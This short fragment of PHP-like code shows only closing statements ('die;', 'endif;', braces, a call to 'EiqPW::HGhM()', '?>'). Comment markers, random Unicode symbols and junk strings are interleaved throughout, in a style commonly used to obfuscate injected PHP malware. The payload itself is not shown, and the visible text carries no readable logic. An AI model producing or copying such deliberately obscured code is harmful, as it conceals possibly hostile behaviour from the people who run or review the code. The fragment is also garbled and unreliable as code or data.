⑰╪⒲▻≷∲⅓▊▔Ⓚ◌⋵㊮⑶∧▫
G|hp⑰╪⒲▻≷∲⅓▊▔Ⓚ◌⋵㊮⑶∧▫
-*///
/*-N@hw-*///
die;/*-


⑿⋰╃➄Ⓢ


~5]-JK[W⑿⋰╃➄Ⓢ


-*///
 endif;/*-

⒮°⇋ⓨ

0CD<sYFv?M⒮°⇋ⓨ

-*///
 }/*-o:-*///
}/*-


℗㊌▨❏↭◁△♦❑↗⊉∾➌∼≕ℭ♟﹨€▁⇖➚㈧⑫▀


;t,℗㊌▨❏↭◁△♦❑↗⊉∾➌∼≕ℭ♟﹨€▁⇖➚㈧⑫▀


-*///
EiqPW/*-.YkB-*///
::/*-b!Z8-*///
HGhM/*-&jt-*///
();/*-


✍☒✼⑬


anF_-xCY✍☒✼⑬


-*///
 ?>